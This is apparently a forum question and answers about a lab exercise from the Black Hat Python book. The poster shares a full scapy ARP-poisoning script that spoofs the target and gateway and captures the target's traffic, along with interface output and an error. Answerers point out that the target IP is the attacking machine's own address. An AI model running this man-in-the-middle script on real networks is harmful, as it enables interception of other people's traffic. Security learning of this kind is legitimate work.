In the fourth chapter of Justin Seitz Black Hat Python book, the section detailing ARP poisoning using scapy. I'm having issues obtaining the mac address of the target ip of the target machine. I'm using a Kali VM as the attacking machine and a Win 7 VM as the target machine.
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth0"
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print "[*} Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(Arp(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
responses, unanswered = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)
for s, r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
posion_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return
conf.iface = interface
conf.iface = interface
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
poison_thread = threading.Thread(target=posion_target, args=(
gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
The attacking machine:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
The output:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
you use the IP of kali ( attacking machine ) as target_ip ( 10.0.2.15 ). Win runs on the same computer, however in a virtual machine and normally a virtual machine has its own IPs ( https://www.quora.com/Do-virtual-machines-have-their-own-IP )
it is even not certain if Win on the VM is on the same network automatically. to assign static IPs for the VM and kali in the same /24 network ( i.e. 10.0.2.x/24 - replace the x ) see https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address
coder is right : first check if network connectivity is established by pinging